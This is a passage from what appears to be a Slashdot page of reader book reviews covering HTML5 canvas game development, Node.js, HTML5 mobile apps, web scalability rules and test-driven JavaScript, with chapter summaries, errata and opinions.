Chapter Two shows the reader how to build a rudimentary paint application with basic capabilities. It does a great job of showing how to expand on the basic functions provided by HTML5 and covers a little bit of the logic behind the behavior. Geary goes so far as to show the reader how to extend some of the core components of HTML5 like CanvasRenderingContext2D with an additional function. He also cautions that this can lead to pitfalls in JavaScript. This chapter does an excellent job of exploiting and enumerating core drawing functionality to achieve the next level in using these lines and objects for a desired user effect. Prior to reading this chapter, I hadn't viewed clip() in the correct light and Geary demonstrates the beginnings of its importance in building graphics. In Chapter Three, text gets the same extensive treatment that the basic drawing elements did in Chapter Two. In reading this chapter, it became apparent hat HTML5 has a lot of tips and tricks (perhaps that comes with the territory of what it's trying to achieve) like you have to replace the entire canvas to erase text. Being a novice, I'm not sure if the author covered all of such things but I was certainly appreciative for those included.

Chapter Four was an eye opener on images, video and their manipulation in canvas. The first revelation was that drawImage() can also render another canvas or even a video frame into the current canvas. The API name was not indicative to me but after reading this chapter, it became apparent that if I sat down and created a layout of my game's surface, I could render groups of images into one off-screen canvas and then continually insert that canvas into view with drawImage(). This saved me from considerable rerendering calls. The author also included some drag and drop sugar in this chapter. The book helped me understand that sometimes there are both legacy calls to old ways of doing things and also multiple new ways to accomplish the same goal. When you're trying to develop something as heavy as a game, there are a lot of pitfalls.

Chapter Five concentrates on animations in HTML5 and first and foremost identifies a problem I had struggled with in writing a game: don't use setInterval() or setTimeout() for animations. These are imprecise and instead the book guides the reader with instructions on letting the browser select the frame rate. Being a novice, the underlying concepts of requestAnimationFrame() had eluded me prior to reading this book. Geary's treatment of discussing each browser's nuances with this method may someday be dated text but helped me understand why the API call is so vital. It also helps you build workarounds for each browser if you need them. Blitting was also a new concept to me as was the tactic of double buffering (which the browser already does to canvas). This chapter is heavy on the hidden caveats to animation in the browser and builds on these to implement parallax and a stopwatch. The end of this chapter has a number of particularly useful "best practices" that I now see as crucial in HTML5 game development.

Chapter Six details sprites and sprite sheets. Here the author gives us a brief introduction to design patterns (notably Strategy, Command and Flyweight) but it's curious that this isn't persisted throughout the text. This chapter covers painters in good detail and again how to implement motion and timed animation via sprites with requestNextAnimationFrame(). This chapter does a great job of showing how to quickly animate a spritesheet.

Chapter Seven gives the user a brief introduction to implementing simple physics in a game engine like gravity and friction. It's actually just enough to move forward with the upcoming games but the most useful section of this chapter to me was how to warp time. While this motion looks intuitive, it was refreshing to see the math behind ease-in or ease-out effects. These simple touches look beautiful in canvas applications and critical, of course, in modeling realistic motion.

Naturally the next thing needed for a game is collision detection and Chapter Eight scratches the surface just enough to build our simple games. A lot of fundamental concepts are discussed like collision detection before or after the collision happens. Geary does a nice job of biting off just enough to chew from the strategies of ray casting, the separating axis theorem (SAT) and minimum translation vector algorithms for detecting collisions. Being a novice to collision detection, SAT was a new concept to me and I enjoyed Geary's illustrations of the lines perpendicular to the normal vectors on polygons. This chapter did a great job of visualizing what the code was achieving. The last thing this chapter tackles is how to react or bounce off during a collision. It provided enough for the games but it seemed like an afterthought to collision detection. Isn't there a possibility of spin on the object that could influence a bounce? These sort of questions didn't appear in the text.

And Chapter Nine gets to the main focus of this book: writing the actual game with all our prior accumulated knowledge. Geary calls this light game engine "the ungame" and adds things like multitrack sound, keyboard event handling and how to implement a heads-up display to our repertoire. This chapter is very code heavy and it confuses me why Geary prints comments inlined in the code when he has a full book format to publish his words in. The ungame was called as such because it put together a lot of elements of the game but it was still sort of missing the basic play elements. Geary then starts in on implementing a pinball game. It may sound overly complicated for a learning text but as each piece of the puzzle is broken down, the author manages to describe and explain it fairly concisely. While this section could use more description, it is basically just bringing together and applying our prior concepts like emulating physics and implementing realistic motion. The pinball board is merely polygons and our code there to detect collisions with the circle that is the ball. It was surprisingly how quickly a pinball game came together.

Chapter Ten takes a look at making custom controls (as mentioned earlier about trying to use HTML when possible). From progress bars to image panners, this chapter was interesting and I really enjoyed the way the author showed how to componentize and reuse these controls and their parts. There's really not a lot to say about this chapter, as you may imagine a lot of already covered components are implemented in achieving these controls and effects.

Geary recognizes HTML5's alluring potential of being a common platform for developing applications and games across desktops and mobile devices. In the final chapter of the book, he covers briefly the ins and outs of developing for mobile — hopefully without having to force your users to a completely different experience. I did not realize that native looking apps could be achieved on mobile devices with HTML5 but even with that trick up its sleeve, it's hard to imagine it becoming the de facto standard for all applications. Geary appears to be hopeful and does a good job of getting the developer thinking about the viewport and how the components of their canvas are going to be viewed from each device. Most importantly, it's discussed how to handle different kinds of input or even display a touch keyboard above your game for alphabetic input.

This was a delightful book that will help readers understand the finer points of developing games in HTML5's canvas element. While it doesn't get you to the point of developing three dimensional blockbuster games inside the browser, it does bite off a very manageable chunk for most readers. And, if you're a developer looking to get into HTML5 game design, I heavily recommend this text as an introduction.

You can purchase Core HTML5 Canvas from amazon.com. Slashdot welcomes readers' book reviews (sci-fi included) -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael Ross writes "Since its introduction in 1994, JavaScript has largely been utilized within web browsers, which limited JavaScript programmers to client-side development. Yet with the recent introduction of Node.js, those programmers can leverage their skills and experience for server-side efforts. Node.js is an event-based framework for creating network applications — particularly those for the Web. Anyone interested in learning this relatively new technology can begin with one of numerous resources, including Sams Teach Yourself Node.js in 24 Hours." Keep reading for the rest of Michael's review. Sams Teach Yourself Node.js in 24 Hours author George Ornbo pages 464 pages publisher Sams Publishing rating 7/10 reviewer Michael J. Ross ISBN 978-0672335952 summary An introduction to the Node.js framework. This book, authored by George Ornbo, was released by Sams Publishing on 15 September 2012, under the ISBN 978-0672335952. The recent publication date is promising, because Node.js is evolving rapidly, thus gradually obsoleting books written not that long ago. On the publisher's page, visitors will find a brief description of Ornbo's book, a few customer reviews, the table of contents, a sample chapter (the 14th, "A Streaming Twitter Client"), and links to purchase the print and electronic versions of the book. There is also a link to the companion site, which offers some of the same content as Pearson's page, but also has a link to download an archive file containing all the example code, nicely organized.

The book's material spans 464 pages, and is organized (shoehorned) into 24 "hours" (chapters), grouped into six parts. The first two chapters in "Getting Started" explain how the reader can download Node.js, create a "hello world" web server program, install new modules using npm (Node Packaged Modules), search for modules, locate documentation on them, and indicate module dependencies for an application. Unfortunately, the blocks of source code presented in the first examples (Listing 1.1 and Figure 2.2) are not explained in the narrative (until the fifth chapter) or even commented. Readers would likely appreciate some clues as to the nature of http.createServer, req, res, the "underscore" module, etc. — especially at the beginning of their journey. If readers are not expected to understand these details at this point, then they should be told so, to avoid any concerns that such an understanding is assumed in the subsequent chapters. The author does not explain where Node.js is installed or what changes it makes to the terminal's default path variable. On page 18, the term "project folder" is unclear: should the "underscore" module end up in hour02/example01/node_modules, or nodejs/node_modules, or nodejs/node_modules/npm/node_modules? Only later is this (partially) answered.

Chapter 3 demonstrates the complexity that arises from concurrent input/output in networked applications. This material should arguably have been presented at the beginning of the book, to better establish the purpose of Node.js, and the value to the reader of studying it. The next chapter summarizes jQuery and JavaScript callbacks, and then provides a helpful discussion of how Node.js uses the latter. The author contends that the asynchronous paradigm of Node.js is unsuitable for long-running processes, but does not explain why this is true, which would have provided some substantiation for the claim.

The second part of the book, "Basic Websites With Node.js," encompasses four more chapters. The first one discusses how to: create a simple server (using the core HTTP module), examine the response headers (generated for web pages, in different browsers and on the Linux command line), execute 301 redirects, respond to different types of requests (using the URL module), and create a simple client. Oddly, the author does not explain or even mention the sizable JSON output — the first line of which is "{ domain: null," — displayed in the reader's server terminal when the web page pointing to that server is refreshed or when the "curl -I" command is run. The next two chapters cover how to build websites using the Express framework, and are likely the first point where the reader will see some of the real-world complexity of Node.js. The eighth chapter explains how to persist data between calls to the application, including files, environment variables, and MongoDB.

Debugging, testing, and deploying are all critical topics for any application development, and are covered in the third part of the book. The author illustrates three methods of debugging: STDIO, a core module, is a lightweight method for debugging Node.js code; it allows one to output messages to the console, check the value of any variable or literal, and track function calls and responses from third-party services. Node.js provides access to the more powerful debugger of V8 (the Google Chrome JavaScript engine), which supports breakpoints and code stepping. Node Inspector, compatible with WebKit-based browsers, provides all of the above functionality, and more. The next two chapters present several modules that ease the important process of creating full-coverage tests, and demonstrate how to deploy applications to any one of three Node.js-capable cloud hosting providers (Heroku, Cloud Foundry, and Nodester).

Having covered the basics of Node.js, the author begins the fourth part of his book with two chapters that show how to use Socket.IO, WebSockets, and Express to build real-time web applications. These techniques are illustrated in the development of a chat server as well as a nickname management and messaging system. The aforementioned sample chapter extends these techniques further in working with the Twitter API to consume its real-time data, push it to the browser, and show results in a dynamic graph. This section is wrapped up with coverage primarily of JSON — specifically, how to create, consume, and send JSON-structured data.

APIs were addressed briefly in the previous section, but are explored much more deeply in the subsequent five chapters. Readers may initially conclude that the discussion of processes is elementary, but the author then shows how one could utilize that knowledge to interact with Node.js scripts, including detecting script exits and errors, sending signals and arguments to a script, generating child processes if needed, and sending messages among them. In the 18th chapter, the author goes into greater detail about Node.js's Events module, best practices, and how to generate event listeners dynamically. The buffer API may be low-level, but it is essential for storing raw binary data, as opposed to the Unicode-encoded strings that JavaScript uses within a browser. The Buffer and Stream modules are presented with plenty of helpful examples.

The last part of the book addresses miscellaneous topics, starting with CoffeeScript (a JavaScript precompiler). While CoffeeScript affords numerous benefits, it is not clear why it would deserve an entire chapter in a book dedicated to Node.js. In the next chapter, readers learn how to verify their Node.js code, add command-line executables, and then package it all up into portable modules that can be contributed to the npm registry or GitHub. The last two chapters explain how to create and configure middleware using the Connect module, and how to use Backbone.js (a front-end JavaScript framework) in conjunction with Node.js to build browser-based web applications.

Each chapter concludes with a summary (invariably a waste of space), a Q&A section, a workshop comprising quiz questions (with the answers presented immediately below it, for almost instant spoiling), and several exercises for the reader.The index at the end is missing several of the important topics discussed in the text.

The book contains many errata: "EBay" (page 1; should read "eBay"), "OSX" (page 9; presumably Mac OS X), "yaml" (page 15; should read "YAML"), "irc" (19), "led to [a] great deal" (27), "to solve Concurrency" (37), "process" (54; should read "processes"), "try and" (55; should read "try to"), "This goal" (56; should read "The goal"), "how [a] class" (56), "You will [see] the" (62), "status of [a] web server" (70), "javascripts" (77), and "then [the] name" (87). At this point, less than 20 percent into the book, it was clear that the copyeditors had done a sloppy job, so I stopped recording these flaws that should have been caught. Those first four errata suggest that "textese" is even pervading the world of technical publishing. (Strangely, there does not appear to be a place on the publisher's website for reporting errata.)

The production team should have been looking for places to cut down on the heft of the print edition. The "Try It Yourself " sections sometimes duplicate what is found in the regular text nearby — especially in the third and fourth chapters. For instance, three sets of HTML markup are repeated, as well as the surrounding discussion (pages 42 through 47).

In general, the text does not appear to have been carefully scrutinized by technical reviewers and copyeditors. Occasionally the reader is given critical information later than would be optimal, e.g., the "Watch Out" warning on page 18, provided after the reader installs a module. The writing style is noticeably awkward in countless places in the book, including several run-on sentences. (Technical authors should not be bashful in using commas when doing so would help readability.) Also, the text is littered with too many exclamation marks — as if that is going to make any narrative more exciting.

In terms of the production quality of the book, a lay-flat binding would have made it much easier to read when using both hands on the keyboard. Also, in my review copy (kindly provided by the publisher), a disappointingly large number of the pages had small black splotches of ink; fortunately, none made the text unreadable.

On the other hand, Node.js is certainly not a simple subject area, and this book is able to convey a lot of information about it. This book's forte is the extensive use of example code to illustrate the concepts being presented. Incidentally, kudos to the author for inviting the reader to contribute to the Node.js community, such as adding new modules to GitHub or updating the documentation of existing modules. Overall, readers new to Node.js would certainly benefit from working their way through this volume.

Michael J. Ross is a freelance web developer and writer.

You can purchase Sams Teach Yourself Node.js in 24 Hours from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Michael J. Ross writes "The last few years have seen the emergence of several significant advances in web technologies, including HTML5 and CSS3 — all impacting the development of traditional and mobile-centric web sites. In turn, various technical book publishers have released titles addressing one or more of these technologies. While one book may focus on HTML5 and the new JavaScript APIs, another might include extensive coverage of CSS3, with little mention of JavaScript. A recent title, Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours, focuses on some of the more commonly employed elements introduced with HTML5, and how they can be used for creating mobile sites and applications." Read below for the rest of Michael's review. Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours author Jennifer Kyrnin pages 496 pages publisher Sams Publishing rating 8/10 reviewer Michael J. Ross ISBN 978-0672334405 summary A tutorial on building web sites and apps with HTML5. This book was authored by Jennifer Kyrnin, who has plenty of experience in using as well as teaching web design techniques, and who curates the Web Design / HTML section of About.com. The book was put out by Sams Publishing (an imprint of Pearson Education) on 25 November 2011, under the ISBN 978-0672334405. On the publisher's page, visitors will find the book's description and table of contents, and some sample content in a PDF document, including the first chapter, "Improving Mobile Web Application Development with HTML5." The page appears to not list any reported errata. This book is available in both print and electronic formats (EPUB and PDF), but prospective buyers should be warned that the e-book is less than seven dollars cheaper than the print version ($25.59 versus $31.99), despite the huge disparity in production and distribution costs. The author's web site offers additional information, primarily in the form of a newsletter devoted to HTML5. The preface claims that this second web site has the example source code from the book, as well as ways to ask questions and report errata; but if so, they are well hidden, as of this writing.

Spanning 496 pages in total, the book's material is organized into two dozen chapters, as is usual with any of the books in the "Sams Teach Yourself X in 24 Hours" series. Readers may well wonder if this artificial constraint causes the various authors to structure their books in a way that does not always make sense. In the case of this title, there does appear to be some forced splitting of material between two chapters, namely, "Building a Mobile Web Application" and "Converting Web Apps to Mobile." Conversely, three topics that may deserve their own chapters are lumped together, in "WebSockets, Web Workers, and Files." Moreover, it is arguably unrealistic to expect that the typical reader will be able — or would even attempt — to read and comprehend a technical book of such length and subject matter in only 24 hours — to say nothing of the time required to type in the sample code (in order to test it and reinforce the information learned). This "teach yourself in 24 hours" format borders on "brain surgery in three easy steps." Lastly, it leads to silly phrasing such as: "a result of reading the hour" (page xvii).

The chapters and appendices are grouped into four parts, the first of which is titled "Building Web Pages and Applications with the Open Web Standard." The structure of the first chapter is replicated in all of the other chapters: The author briefly lists what the reader will learn, and then begins explicating the concepts, illustrated with example code wherever appropriate. Each chapter concludes with a summary (which is of no value), several FAQs (whose material should instead be folded into the main chapter content), and a workshop section comprising quiz questions and exercises for the reader to tackle. Part I's eight chapters introduce HTML5, web applications, the W3C Open Web Standard, the new HTML5 elements and their attributes, CSS3 (with justifiably limited coverage), mobile browser detection, JavaScript, and jQuery. Then the author presents the basics of how to build mobile web apps, both from scratch and from using a non-mobile web site as a starting point.

Part II, "Learning the HTML5 Essentials," goes into greater detail of numerous basic aspects of HTML5: the new HTML5 sectioning, heading, and semantic elements; the semantic repurposing of some HTML 4 elements; the new canvas element (with limited coverage of this extensive topic); new typography support; audio and video elements; new form capabilities; HTML editable content, spell checking, and other user interactivity; microformats, microdata, and RDFa; in-page drag and drop; and new functionality for linking (the <a>, <area>, and <link> elements). Readers should note that the discussion in the ninth chapter on the new sectioning elements starts off rather confusingly, but soon improves, making it well worth reading.

The third part of the book, "HTML5 for Mobile and Web Applications," begins with an introduction to web apps, as well as the HTML5 application programming interfaces (APIs) and data sets upon which they may rely. The author then discusses specific APIs that can be of great use in web apps — specifically, the WebSockets, Web Workers, and File APIs, which allow one to make asynchronous connections between the app and a remote host, perform scripted background processing, and access local files. The remaining chapters show how to: make a web app usable even when it is disconnected from the Internet; save data on the client side (using local storage, session storage, Web SQL, and IndexedDB); control the browser history; geolocate the client; and convert an HTML5 application into a native mobile app, with detailed information on using PhoneGap. Aside from the index, the book concludes with three appendices that cover: answers to the end-of-chapter quizzes; a list of the HTML5 elements and their more commonly-employed attributes; and a list of other books and web sites that address HTML5 and mobile design and development.

The average programming book — particularly one of this size, and in a first edition — will contain some errata, and this one is no exception: "shortcut style" should read "shorthand style" (page 37); "Specific[,] Measurable" (87); "complimentary" should read "complementary" (93); the "By the Way" section on page 131 is missing a close parenthesis; "html5elmeents" (136); "will [be] eventually" (184); "a straight line [] they" (184); "makes build[ing] forms" (223); "method[s] exist" (362); "the page [it] is on" (383); and "()creates" (390).

There are some other parts of the text where either the author or the editorial team may have been careless — for instance, the figcaption and figure tags repeated on pages 16 and 18. Fortunately, such cases are few and far between. The HTML, CSS, and JavaScript code is generally of decent quality, except much of the HTML markup is not indented properly. In the JavaScript code, most if not all of the string concatenation is jammed together, making the elements difficult to distinguish (e.g., page 72). Also, some of the HTML does not utilize the more streamlined attributes of HTML5, such as <script type="text/javascript"> (e.g., page 20), or is not well formed, such as </li> tags missing (e.g., pages 236 and 250).

The author occasionally uses terminology that would be comprehensible only to someone who already has the knowledge that the narrative presents for the first time, without providing at least a quick explanation, e.g.: the !"!" JavaScript operator (page 55); the terms "rollover" and "user agent" (page 69 for both); and "the manifest comes up 404 or 410" (page 342). Some of the advice may be true, but is rather outdated, such as the admonitions in the first chapter to not use frames, nor to use tables or spacer images for layout. Those principles were validated and disseminated many years ago. Some statements could easily be misinterpreted by beginners, e.g., "As long as your HTML file is in the same folder as your style sheet file, it will load your styles when your page is loaded" (page 36). Other statements are not explained in detail or substantiated, and consequently the reader will probably not understand the reasoning behind it, e.g., "using the min- and max- extensions is more effective" (page 61), and "a separate mobile domain [] makes your mobile site easier to find" (page 10). Readers may disagree completely with some of the claims, e.g., "XHTML [is] very difficult to write" (page 2).

There are only two discernible problems with the production of the book: In some of the HTML code, curly quotes are used (e.g., page 303). Secondly and more importantly, the san-serif font used to indicate keywords looks much too similar to the serif font of the regular text, causing the keywords to blend into the surrounding material.

Yet the main problem with the narrative is the somewhat erratic manner in which the author skips from one topic to the next, often providing just a few paragraphs or even sentences for each topic — giving the impression that critical information may have been neglected as a result of the less-than-methodical organization of the material. Most of those topics are discussed again, in varying levels of detail, in later chapters. This is not optimal, because technical readers generally hope to find full coverage of any given topic in one place; hence, it can be frustrating if the information is scattered throughout a book. This is especially true if the reader has already read the book in full, and is now returning to it in order to utilize it as a reference source. For instance, in many cases, attributes are presented, but without detailed explanation or examples. Fortunately, the worst of it seems to be confined to Part I of the book, which contains most of the introductory material. Most if not all of the key concepts appear to be addressed to at least some extent. Lastly, some of the information that should have been presented right up front, is not, e.g., the definitions of HTML5 on pages xiv, 1, and 52.

Unlike most programming books nowadays, this one has few instances of phrasing that would baffle the reader for long, and there are no goofy attempts at humor. For most of the topics, the information provided is the minimum to achieve the bulk of the desired results. The advantage to this is that the narrative is generally concise and quick to read, and the author is able to cover a lot of ground without having to package such a broad topic in a (more expensive) tome. Some of the narrative is quite good, such as the explanations of the various browser exceptions involved in the HTML5 drag-and-drop functionality.

Despite the aforementioned blemishes, this book is definitely worth a look, because it is currently one of the most complete tutorials for learning how to use HTML5 for creating mobile apps and web sites.

Michael J. Ross is a freelance web developer and writer.

You can purchase Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

eldavojohn writes "As a web developer in the 'Agile' era, I find myself making (or recognizing) more and more important decisions being made in developing for the web. Scalability Rules cemented and codified a lot of things I had suspected or picked up from blogs but failed to give much more thought to and had difficulty defending as a member of a team. A simple example is that I knew state is bad if unneeded but I couldn't quite define why. Scalability Rules provided this confidence as each of the fifty rules is broken down in a chapter that is divided into what, when, how, why and key takeaways. A strength of the book is that these rules cover all aspects of web development; but that became a double edged sword as I struggled through some rules meant for managers or technical operators." Read below for the rest of eldavojohn's review. Scalability Rules: 50 Principles for Scaling Web Sites author Martin L. Abbot and Michael T. Fisher pages 272 publisher Addison-Wesley Professional rating 8/10 reviewer eldavojohn ISBN 978-0321753885 summary 50 Principles for Scaling Web Sites You might recognize the authors as two of the three partners of AKF Partners which means that the book pushes a lot of their concepts like the AKF Cube. A bonus is that they have a very long list of clients and aren't afraid to remind the reader that they have consulted to hundreds of companies so when they say they see these rules solving problems frequently, there's weight to that. Also, they have two books but don't confuse Scalability Rules with The Art of Scalability as the latter focuses on people, processes and technology instead of the rules of scaling.

First off this book gives you a primer of rules for you to start with depending on whether you are mostly a manager, software developer or technical operations personnel. I'll concentrate on the specifics of the software developer chapter and summarize the others at the end of this review. Also note that aside from some SQL, I only saw PHP code in this book. Luckily there's only a handful of snippets presented and they are easy to follow. Additionally each chapter ends with solid references (usually online resources) to back up the claims listed in those sets of rules.

The first chapter is devoted to reducing the equation and focuses on removing needless complexity from your solution. You can find this chapter here if you want to see how the layout looks. They give a lot of solid reasons for this and also a lot of good examples like understanding what your users care about. Why build a prompt to export a blog post as a PDF if 99% of the users don't care about it? Next up they say the rule to design to scale means designing for 20x capacity, implementing for 3x capacity and deploying to 1.5x capacity. A strength of the book are the grids that illustrate what is low, medium or high cost and impact through the chapters. Every time they discuss options at different parts of the solution development process, the user is given a chart to understand why. The next rule stresses that you can usually identify 80% of your benefit achieved from 20% of the work (80-20 rule). Rule 4 is strangely specific and implores the reader to simply reduce DNS lookups. However — and this is the first of many — they remind the reader that this rule must be balanced with putting your system all on one server just to reduce DNS lookups. Such a strategy can result in that becoming a choke point. Rule 5 quite simply instructs the reader to use as few objects as possible in your webpage.

The final rule of chapter one is the first one I disagree with in the book. The rule says "Don't mix the vendor networking gear." And this goes against every fiber of my being. Why even have networking standards if you are not to mix the vendor networking gear? Looking to upgrade one component? Better stick to brand X no matter how crappy they have become. This results in being nickeled and dimed and vendor lockin. If scalability is your sole goal than perhaps this is sound instructions. But I cannot understand how anyone would indicate lockin to a vendor — especially in today's networking gear.

Chapter two is incredibly short but potent. It covers some basic database concepts like why ACID properties of databases make them difficult to split. This chapter is spot on and calls upon the AKF cube for dimensions of scalability. Three dimensions are: You can clone things, split different things and split similar things (like by country region). This cube reappears throughout the book and it should be noted that the book does a good job of giving examples of when each dimension is a good choice for scaling and when it is a bad choice compared to the other two. In my line of work, massive scaling solutions have implemented all three.

Skipping to the next developer chapter on not duplicating your work, the text ranged from the incredibly obvious "Don't double check your work" to relaxing temporal constraints. The chapter is short like chapter two and didn't offer me a whole lot. A third rule was again oddly specific in saying not to do redirects and even getting down into the very fine specifics of what HTTP codes are and how they affect your response times.

The next chapter for developers is chapter ten on avoiding or distributing state. Rule 40 actually came in useful at my job as it simply states "Strive for Statelessness." There was an easy solution to a problem in one of our projects that involved storing an object in the session to keep track of what was being displayed to the user. Having read the book, I instead made this web application nearly stateless (except user authentication and the like). Later on, as we started testing the application in multi-tabbed browsing and users began opening many search tabs and viewed several objects at once to compare them, I was glad that I had not gone down this path. Doesn't have much to do with scalability but I think all web developers should read this chapter as it really does pay to avoid state when possible.

As the rules grew closer to 50, they lost their potency. The authors did a good job of trying to put a bit of ranking in the appearance to these rules. The final developer chapter on asynchronous communication and message buses is probably the most specific and was the least useful for me. While all the rules in this chapter are true, they again border on the banal with examples like "Avoid Overcrowding Your Message Bus."

Having read this book cover to cover, it is a very short book with extremely succinct and organized summaries (the final chapter is a short review of each rule). The manager and operations chapters didn't really do a lot for me overall but would occasionally have very interesting chapters that opened up a lot of the logic behind content delivery services to me. Occasionally I would take slight issue with some rules but the most egregious rule I read was Rule 28 "Don't Rely on QA to Find Mistakes" and then the chapter opens with calling the title of this rule "ugly and slightly misleading and controversial." Because it is and could probably be replaced with another sentence from the chapter: "You can't test quality into your system." Why rely on sensational headlines when I'm already holding your book? I think this book would have been a solid 9/10 if not for this oddity in the large rule set.

I've given each of these rules a decent amount of thought and will keep them at the back of my mind as I write code in an agile environment. Mistakes made early on can be very costly in scaling terms. This book will definitely be kept around at work when I need a solid argument for those design decisions that might take more work but save in the future when it needs to scale.

You can purchase Scalability Rules: 50 Principles for Scaling Web Sites from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

eldavojohn writes "Test-Driven JavaScript Development by Christian Johansen is a book that thoroughly guides the user through some of the more advanced aspects of the JavaScript language and into Test-Driven Development (TDD). Throughout it, Johansen introduces great methods and utilities like libraries to accomplish all aspects of TDD in JavaScript. The book begins with Johansen demonstrating and teaching the reader some of the more advanced aspects of JavaScript to ensure that the following lessons in TDD are well understood. The best part of the book is in the last half where Johansen builds a chat client and server completely out of JavaScript using TDD right before the readers' eyes." Keep reading for the rest of eldavojohn's review. Test-Driven JavaScript Development author Christian Johansen pages 475 publisher Addison-Wesley Professional rating 9/10 reviewer eldavojohn ISBN 978-0-321-683915 summary An in depth look at Test Driven Development in JavaScript. First off the audience for this book are JavaScript developers interested in TDD. More specifically, I would identify the audience being the poor developers that have slaved over JavaScript for endless hours only to find out that there are 'discrepancies' in how their JavaScript functions in one browser versus another (or even across versions of the same browser). If you've ever came into work one day to learn that the latest version of Internet Explorer or Mozilla Firefox now throws errors from the deep recesses of your code and you have absolutely no idea where to start, then this book may be an item of interest to you. After all, wouldn't it be great to pull up the new browser and simply watch all your tests complete code coverage with glaring red results listing specific problematic locations?

Secondly, I'd like to establish that I'm writing this review with two key assumptions. The first assumption is that JavaScript is not in and of itself evil. You might hate JavaScript (as did I at one time) but it's a very flexible and enjoyable language when you're not battling some crazy 'feature' that a particular JavaScript engine exhibits or some issue with the dreaded Document Object Model (DOM). The second assumption is that TDD is a net positive when done correctly. To some, it may be a hard sell and the author of the book is no blind preacher. TDD has its pitfalls and the book adequately notes these claiming that TDD can actually work against you if used improperly. Feel free to wage wars in the comments debating whether or not the average JavaScript monkey is capable of avoiding pitfalls and learning to write good unit tests — I'm not getting sidetracked in this review on those topics.

This book is divided into four parts. The first part of the book gives you a slight taste of testing right off the bat in chapter one (Automated Testing). Johansen starts by showing a strftime function written in JavaScript and demonstrates briefly the very clumsy standard method of testing the method in a browser. From there he introduces Assertions, Setup, Teardown and Integration Tests. What I particularly enjoyed about this book is that these key components are not forgotten after introducing them, Johansen constantly nods to the reader when duplicate code could be moved to Setup or Teardown.

Chapter two is devoted to 'turning development upside-down.' This chapter analyzes the mentality of writing a test, running the test, watching it fail, making the test pass and then refactoring to remove duplication (if necessary). Johansen stresses and restresses throughout the book that the simplest solution should be added to pass the test. Fight the urge to keep coding when you are sure what comes next and just make sure you have unit tests for that new code. The third chapter runs through many test frameworks in JavaScript and settles in on JsTestDriver weighing the pros and cons of each option. Lastly, it is demonstrated how to use JsTestDriver both inside Eclipse and from the command line (something I deeply appreciated). Chapter Four expands on this by proposing learning tests which are tests that you keep around to try out on new browsers to investigate what you depend on. I'm not entirely sold on this practice but this chapter is definitely worth the look at performance testing it provides in a few of the more complete aforementioned frameworks.

The next 145 pages are devoted to the JavaScript language itself. The reader will find out in later chapters why this was necessary but this second part felt too long and left me starving for TDD. There's a ton of great knowledge in these chapters and Johansen demonstrates an impressive display in his understanding of ECMAScript standards (all versions thereof) and all the JavaScript engines that implement them. In the following four chapters, the reader is shown the ins and outs of scope, functions, this, closures, anonymous functions, bindings, currying, namespaces, memorization, prototypical inheritance, tons of tricks with properties, mixins, strict mode and even the neat features of tddjs and JSON. What I was most impressed with in this chapter was how much care Johansen took with noting performance pitfalls in all of the above. Example: "closures in loops are generally a performance issue waiting to happen" and on for-in arrays he says "the problem illustrated above can be worked around, as we will see shortly, but not without trading off performance." Johansen seems tireless in enumerating the multitude of ways to accomplish something in JavaScript only to dissect each method critically. If you skip these sections, at least look at 6.1.3 as the bind() implementation developed there becomes critical throughout much of the book's code.

Chapter nine provides yet more dos and do nots in JavaScript with a tabbed panel example that demonstrates precisely what obtrusive JavaScript is and why it is labeled as such. Chapter ten is definitely not to be skipped over as it provides feature detection methods (specifically with regard to functions and properties) that are seen in later code snippets. Part two is devoid of any TDD yet rich in demonstrating the power of JavaScript. This is where the book loses a point for me as this seemed too long and a lot of these lessons — though informative — really seemed like they belonged in another book on the JavaScript language itself. I constantly wondered when I would start to see TDD but to a less experienced developer, these chapters are quite enlightening.

In the third part, we finally get to some TDD in which an Observer Pattern (pub/sub) is designed using tests with incremental improvements in true TDD fashion. Most importantly to the audience, we encounter our first browser inconsistencies that are tackled using TDD. This chapter illustrates how to make your first tdd.js project using the book's code and build your first tests followed up with the isolation of the code into setup and teardown functions. Rinse, wash, repeat for adding observers, checking for observers and notifying observers (all key functionality in the common observer paradigm). This is a great pragmatic example for TDD and the chapter wraps up with error checking and a new way to build a constructor. As we do this, we have to make changes to the tests and Johansen illustrates another critical part of TDD: fixing the tests after you've improved your code.

The twelfth chapter takes our Ajax friend the XMLHttpRequest object and gives it the same treatment as above. Of course, you might know it as the Msxm12.XMLHTTP.6.0 object or a variety of names so this is where our browser differences are exposed. On top of that, we're exposed to stubbing in order to test such an object. The author explores three different ways of stubbing it while building tests for GET requests. After building helpers to successfully stub this, we move on to POST, finally send data in a test and then pay attention to the testing of headers. Personally these two chapters were some of the best in the book and illustrated well a common method of utilizing TDD and stubbing to build up functional JavaScript.

Chapter thirteen builds on the previous chapter by examining polling data in JavaScript and how we might keep open a constant stream of data. Before jumping to the solution, the author investigates strategies like polling intervals and long polling which have their downfalls. We eventually come to the Comet client (which uses JSON objects) and build up our test cases that support our development of our new streaming data client. One important aspect brought up is the trick of using the Clock object to fake time. This was completely new to me and very interesting in simulating time with tick() to quickly fake and test expected lengths of time.

Chapter fourteen was definitely outside of my comfort zone. JavaScript on the server-side? Blasphemy! Johansen begins to bring together the prior elements to form a fully functional chat server all in JavaScript through TDD. In this chapter the reader is introduced to node.js and a custom version of Nodeunit the author modified to make a little more like JsTestDriver. The controller emerges through the TDD cycles. Responses to POST, adding messages, the domain model and even storage of data are given test cases to insure we are testing feature after tiny feature. Toward the end of the chapter, an interesting problem arises with our asynchronous interface. In testing it, how do we know what will result from a nested callback? Johansen introduces the concept of a Promise which is a placeholder that eventually provides a value. Instead of accepting a callback, the asynchronous method returns a promise object which is eventually fulfilled. We can now test adding messages in asynchronous manner to our chat room. The chapter builds on the chat server to passable functionality — all through TDD.

